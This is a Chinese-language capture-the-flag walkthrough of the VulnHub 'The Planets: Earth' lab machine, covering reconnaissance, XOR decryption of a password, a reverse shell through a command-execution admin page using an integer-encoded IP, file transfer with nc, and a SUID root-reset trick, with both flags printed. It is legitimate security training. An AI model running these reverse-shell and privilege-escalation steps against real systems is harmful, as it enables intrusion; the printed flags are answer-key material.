英文名稱：The Planets: Earth
中文名稱：行星：地球
釋出日期：2021 年 11 月 2 日
難度：簡單
描述：地球是一個簡單的盒子，盡管您可能會發現它比本系列中的“水星”更具挑戰性，并且根據您的經驗，在簡單的更難的一面。盒子上有兩個标志：一個使用者标志和一個包含 md5 哈希的根标志。這已經在 VirtualBox 上進行了測試，是以在 VMware 上可能無法正常工作。如有任何問題/問題或回報，請發送電子郵件至：http://protonmail.com 上的 SirFlash，盡管我可能需要一段時間才能回複您。
下載下傳位址：https://www.vulnhub.com/entry/the-planets-earth,755/

ailx10

網絡安全優秀回答者

網絡安全碩士

去咨詢

1、嘗試發現IP位址，發現1個可疑IP

earth.lan (192.168.199.179)

└─$ nmap -sP 192.168.199.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 13:21 CST
Nmap scan report for Hiwifi.lan (192.168.199.1)
Host is up (0.0027s latency).
Nmap scan report for 192.168.199.114
Host is up (0.0037s latency).
Nmap scan report for N3NXCV065297107.lan (192.168.199.151)
Host is up (0.0092s latency).
Nmap scan report for earth.lan (192.168.199.179)
Host is up (0.0020s latency).
Nmap scan report for kali.lan (192.168.199.247)
Host is up (0.00051s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.70 seconds

2、嘗試對IP位址進行端口掃描，開放了22端口、80端口、443端口

$ nmap -A 192.168.199.179        
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 13:28 CST
Nmap scan report for earth.lan (192.168.199.179)
Host is up (0.61s latency).
Not shown: 933 filtered tcp ports (no-response), 64 filtered tcp ports (host-unreach)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time

3、準備對該網站進行頁面暴力破解，需要先配置hosts檔案

192.168.199.179 terratest.earth.local
192.168.199.179 earth.local

4、爆破結果如下，80端口有web背景，443端口有web首頁和robots檔案

---- Scanning URL: http://terratest.earth.local/ ----
+ http://terratest.earth.local/admin (CODE:301|SIZE:0)     

+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)                  
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)

5、通路web頁面，在robots.txt中尋找到 testingnotes.* 通路路徑

首頁

背景

robot.txt

6、順着提示，進入testingnotes.txt 頁面，得到2條線索

密鑰線索：testdata.txt
使用者名線索：terra

線索頁面

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

測試安全消息系統注意事項：
*使用 XOR 加密作為算法，在 RSA 中使用應該是安全的。
*地球已确認他們已收到我們發送的消息。
*testdata.txt 用于測試加密。
*terra 用作管理門戶的使用者名。
去做：
*我們如何安全地将我們的每月密鑰發送到地球？ 還是我們應該每周更換密鑰？
*需要測試不同的密鑰長度以防止暴力破解。 鑰匙應該多長？
*需要改進消息界面和管理面闆的界面，目前非常基礎。

7、順着線索，繼續找

線索頁面

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
根據輻射測年估計和其他證據，地球形成于 45 億年前。
在地球曆史的最初十億年中，生命出現在海洋中并開始影響地球的大氣和地表，導緻厭氧生物和後來的需氧生物的擴散。
一些地質證據表明，生命可能早在 41 億年前就已經出現。

8、在首頁中發現，3段密文，需要根據上面的提示，計算出對應的明文

首頁中的3段密文

Previous Messages: 
    37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
    3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
    2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

9、對首頁中的3段消息，進行xor 解碼，得到提示：earthclimatechangebad4humans

b'According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth\'s hisCfy //}omo;/ppeare\'2~d;\x7ff$\'x,\x7fjj=*alf3,oq|y$w6&|%Qjvw+U <@f;y/j\x7fkr0~h<Pj1s.=\x06i\x97\xf3\xdcs-q,<j${ugn$u6&\x7f*+o\'erlj|mnn/?;-\'\x7f1%,f{kx8.`\x7fb)"\x8c\xe5\x99np`ust*yzd1}xbi:o{)~sh},^6#Tjcy7aj,yn>Hhu-\x17skl)$In*\'y/dybj7pt4~u"t=5jgh&#yx*+fwi=/eapyrncanxky\x7f8/k<\x0b6=+1\x80\xe8\xdaq*Ir8xo"P|7wfbn'
b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the prol^rrlj~<evy\x7f{&*xk|h$kaw-oc 0-'web146iqc$hte7af#`ec~)o>kFnkukzdt|a>y~ciyvb~jn$6O?0i~\x7fd|0v|$lx4~%5l3d*`mx6a8{vcketdia %e,{tr9x>q{1w$h&v~oaxx-)if4tv6pudk"
b'earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat'

解碼代碼參考：

import binascii
import base64
data1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
data3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
s1 = (hex(int(data1,16) ^ int(f,16)))
t1 = base64.b16decode(str(s1[2:]).upper())
s2 = (hex(int(data2,16) ^ int(f,16)))
t2 = base64.b16decode(str(s2[2:]).upper())
s3 = (hex(int(data3,16) ^ int(f,16)))
t3 = base64.b16decode(str(s3[2:]).upper())
print(t1)
print(t2)
print(t3)

10、拿着使用者名+密碼，成功登入測試頁面，發現竟然是一個指令執行

測試背景頁面

11、嘗試通過nc反彈shell

攻擊機：
nc -lvnp 4444
靶機：
bash -i >& /dev/tcp/3232286711/4444 0>&1

其中：3232286711 為 IP位址的整形轉換，可參考代碼：

import socket
import struct
ip = "192.168.199.247"
int_ip = socket.ntohl(struct.unpack("I",socket.inet_aton(str(ip)))[0])
print(int_ip)

成功拿到shell

反彈shell成功

12、嘗試查找flag

find / -name "*flag*" 2>/dev/null

查找flag檔案位置

得到flag潛藏的位置：

/var/earth_web/user_flag.txt

檢視flag内容：

cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

13、繼續尋找root使用者的flag，查找具有suid權限的檔案

bash-5.1$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1

執行/usr/bin/reset_root

bash-5.1$ /usr/bin/reset_root
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

檢查是否存在複位觸發器...
重置失敗，所有觸發器都不存在。

14、将reset_root檔案發回本地跟蹤執行，這裡使用nc檔案傳輸功能

攻擊機：
└─# nc -lvp 5555 >reset_root
listening on [any] 5555 ...
connect to [192.168.199.247] from terratest.earth.local [192.168.199.179] 53332

靶機：
bash-5.1$ nc 192.168.199.247 5555 < /usr/bin/reset_root
nc 192.168.199.247 5555 < /usr/bin/reset_root

15、在本地進行調試，發現缺少3個檔案夾

/dev/shm/kHgTFI5G
/dev/shm/Zw7bV9U5
/tmp/kcM0Wewe

┌──(root㉿kali)-[/home/ailx10]
└─# ./reset_root          
zsh: 權限不夠: ./reset_root
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# ls -hl reset_root 
-rw-r--r-- 1 root root 24K  8月 20 15:20 reset_root
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# chmod +x reset_root   
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# ./reset_root       
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# strace reset_root
strace: Can't stat 'reset_root': 沒有那個檔案或目錄
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# strace ./reset_root
execve("./reset_root", ["./reset_root"], 0x7ffecb5955a0 /* 32 vars */) = 0
brk(NULL)                               = 0x7bd000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (沒有那個檔案或目錄)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=87631, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 87631, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe7b3a83000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0@y\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\200\0\300\4\0\0\0\1\0\0\0\0\0\0\0", 32, 848) = 32
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0?\323\315\324#\241\204X\331\333:^P\242\263\300"..., 68, 880) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1904752, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7b3a81000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1938296, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fe7b38a7000
mprotect(0x7fe7b38cd000, 1724416, PROT_NONE) = 0
mmap(0x7fe7b38cd000, 1409024, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7fe7b38cd000
mmap(0x7fe7b3a25000, 311296, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x17e000) = 0x7fe7b3a25000
mmap(0x7fe7b3a72000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ca000) = 0x7fe7b3a72000
mmap(0x7fe7b3a78000, 33656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fe7b3a78000
close(3)                                = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7b38a5000
arch_prctl(ARCH_SET_FS, 0x7fe7b3a82580) = 0
mprotect(0x7fe7b3a72000, 12288, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ)     = 0
mprotect(0x7fe7b3ac8000, 8192, PROT_READ) = 0
munmap(0x7fe7b3a83000, 87631)           = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0
brk(NULL)                               = 0x7bd000
brk(0x7de000)                           = 0x7de000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (沒有那個檔案或目錄)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (沒有那個檔案或目錄)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (沒有那個檔案或目錄)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0)                           = ?
+++ exited with 0 +++

于是建立檔案夾

bash-5.1$ mkdir dev/shm/kHgTFI5G
mkdir dev/shm/kHgTFI5G
bash-5.1$ mkdir /dev/shm/Zw7bV9U5
mkdir /dev/shm/Zw7bV9U5
bash-5.1$ mkdir /tmp/kcM0Wewe
mkdir /tmp/kcM0Wewe

16、再次嘗試重置root密碼

/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth

檢查是否存在複位觸發器...
存在重置觸發器，正在将根密碼重置為：地球

得到root密碼：Earth

17、切換到root使用者，再次搜尋flag

su -u root

切換到root

cat /root/root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at [email protected]
[root_flag_b0da9554d29db2117b02aa8b66ec492e]

到此，實驗完成～

釋出于 2022-08-20 15:39

vulnhub刷題記錄（The Planets: Earth）